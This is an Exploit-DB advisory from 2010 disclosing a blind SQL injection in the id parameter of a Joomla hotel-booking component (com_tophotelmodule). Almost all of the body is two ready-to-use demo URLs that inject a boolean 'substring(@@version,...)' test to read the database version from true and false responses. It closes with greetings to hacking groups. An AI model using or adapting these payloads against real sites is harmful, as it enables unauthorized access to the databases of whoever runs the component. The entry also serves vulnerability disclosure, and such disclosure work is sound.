Joomla Component Regional Booking id Blind SQL Injection Vulnerability

2010-01-07T00:00:00
ID EDB-ID:11061
Type exploitdb
Reporter Hussin X
Modified 2010-01-07T00:00:00

Description

Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack